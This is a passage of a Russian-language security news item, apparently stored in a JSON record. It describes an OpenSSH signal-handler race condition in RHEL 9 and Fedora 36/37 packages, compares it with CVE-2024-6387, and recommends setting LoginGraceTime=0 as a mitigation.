SSH.\n\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH, \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0445 \u0432 RHEL 9, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0435 OpenSSH 8.7.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 Fedora Linux 36 \u0438 37, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u044b \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0445 OpenSSH 8.7 \u0438 8.8.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0433\u043e\u043d\u043a\u0438 \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u043d\u0438\u0439 SIGALRM, \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e\u0433\u043e \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435, \u043d\u043e \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0441\u0432\u043e\u0435\u0439 \u043f\u0440\u0438\u0447\u0438\u043d\u043e\u0439. \u041e\u043d\u043e \u0437\u0434\u0435\u0441\u044c \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u044b\u0437\u043e\u0432\u043e\u043c cleanup_exit() \u0432 grace_alarm_handler() \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u0425\u043e\u0442\u044f\u00a0cleanup_exit() \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u043c \u043a\u043e\u0434\u0435 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u043a\u043e\u0434\u043e\u0432\u043e\u0439 \u0431\u0430\u0437\u0435 OpenSSH, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435, \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043d\u043e\u0435 \u043a \u043f\u0430\u043a\u0435\u0442\u0430\u043c RHEL 9 \u0438 Fedora, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u0432\u044b\u0437\u043e\u0432 cleanup_exit() \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u0430\u0443\u0434\u0438\u0442\u0430, \u0447\u0442\u043e \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e \u0434\u043b\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e\u00a0\u0437\u0430\u044f\u0432\u043b\u0435\u043d\u0438\u044e\u00a0Solar Designer \u043d\u0430 Openwall, \u0433\u043b\u0430\u0432\u043d\u043e\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 CVE-2024-6387 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b RCE \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442\u0441\u044f \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 privsep, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u043f\u043e\u043d\u0438\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438, \u0447\u0442\u043e \u0441\u043c\u044f\u0433\u0447\u0430\u0435\u0442 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0443\u0449\u0435\u0440\u0431.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c. \u0415\u0441\u043b\u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u0434\u043d\u0430 \u0438\u0437 \u044d\u0442\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0438\u043b\u0438 \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0430, \u0434\u0440\u0443\u0433\u0430\u044f \u0441\u0442\u0430\u043d\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u0437\u043d\u0430\u0447\u0438\u043c\u043e\u0439.\n\n\u041a\u0430\u043a \u043e\u0431\u044a\u044f\u0441\u043d\u044f\u0435\u0442 Designer, \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u044f\u0432\u0438\u0442\u044c\u0441\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043f\u0440\u043e\u0442\u0438\u0432 \u043b\u044e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0443\u043c\u0435\u043d\u044c\u0448\u0438\u0442\u044c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u0438\u043b\u0438 \u0443\u0432\u0435\u043b\u0438\u0447\u0438\u0442\u044c \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c \u0443\u0441\u043f\u0435\u0445\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u0435\u043a\u0443\u0449\u0438\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0438 Fedora, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 Fedora 38, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 OpenSSH \u0431\u0435\u0437 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430 cleanup_exit().\n\n\u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u043e\u0431\u0445\u043e\u0434\u043d\u043e\u0439 \u043f\u0443\u0442\u044c \u0434\u043b\u044f CVE-2024-6387, \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0438\u0439 \u043e\u043f\u0446\u0438\u044e -e \u0432 sshd \u0434\u043b\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0436\u0443\u0440\u043d\u0430\u043b\u0430 syslog, \u043d\u0435 \u0440\u0435\u0448\u0430\u0435\u0442 \u044d\u0442\u0443 \u043d\u043e\u0432\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443.\n\n\u0412\u043c\u0435\u0441\u0442\u043e \u044d\u0442\u043e\u0433\u043e\u00a0\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 LoginGraceTime=0 \u0432 sshd_config \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.", "creation_timestamp": "2024-07-09T20:20:10.000000Z"}]}